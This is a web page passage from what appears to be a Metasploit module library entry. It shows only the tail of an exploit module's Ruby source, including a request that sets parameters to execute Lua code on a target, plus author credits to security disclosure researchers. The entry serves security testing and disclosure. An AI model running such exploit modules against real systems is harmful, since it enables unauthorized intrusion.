120:	           'execute' => 'true',
121:	           'ex' => '2.1',
122:	           'type' => 'lua'
123:	         }
124:	       }, 20)
125:	    rescue StandardError => e
126:	      fail_with(Failure::NoAccess, "Error: #{e}")
127:	    end
128:	  end
129:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure
  • Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.